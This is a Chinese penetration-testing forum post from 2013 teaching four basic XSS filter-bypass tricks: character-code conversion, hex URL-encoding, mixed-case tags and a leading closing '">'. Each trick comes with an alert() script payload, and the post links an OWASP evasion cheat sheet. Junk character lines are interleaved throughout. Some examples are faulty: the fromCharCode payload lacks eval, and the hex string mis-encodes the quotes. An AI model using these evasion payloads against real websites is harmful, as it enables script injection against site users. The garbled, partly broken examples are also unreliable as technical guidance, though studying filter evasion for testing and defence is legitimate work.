中国网络渗透测试联盟
标题:
XSS 绕过技术
[打印本页]
作者:
admin
时间:
2013-2-14 00:10
标题:
XSS 绕过技术
四种超级基础的绕过方法。
6 \8 V. ]1 F( c. g8 |
1.转换为ASCII码
% d7 ~1 j7 Q: r$ ]2 }1 V$ }
例子:原脚本为<script>alert(‘I love F4ck’)</script >
7 X9 l+ V" x/ ~7 B
通过转换,变成:
' A$ {0 z& w! Q; j
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>
8 X6 ]( n/ [" }7 B4 [
: Q `9 F" \2 ?) @! ^0 a! v
2.转换为HEX(十六进制)
[+ e3 x9 K8 K" r" b5 k
例子:原脚本为<script>alert(‘I love F4ck’)</script>
7 s* [! Q: i# ]2 B% y- s5 Z1 G
通过转换,变成:
. R' F: ]; |- j0 X) \6 k
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e
7 E ^8 f: _1 H' _
9 Y4 Z. Q, i, I4 t2 G. u0 ]: H
3.转换脚本的大小写
4 M2 v2 |) S/ c; p8 k t
例子:原脚本为<script>alert(‘I love F4ck’)</script>
0 Y* b; w1 ^8 B5 z) g
转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>
1 X, |. l; d& N7 F, L4 v
. o& R$ F8 m% P) a O2 V! v
4.增加闭合标记”>
) P( _- R K( i: C% y
例子:原脚本为<script>alert(‘I love F4ck’)</script>
- @% q6 E7 I u5 l! \- [" Y7 |$ k
转换为:”><script>alert(‘I love F4ck’)</script>
8 a9 b2 E3 q( z) x
更详细绕过技术请参考此网页
Z6 z1 Z$ L5 P& X4 c- n5 @
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
. k0 t T" {+ m% w; ]" w/ b; ]
8 l8 I7 \0 ^$ \2 I
转换工具使用的是火狐的 hackbar mozilla addon.
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2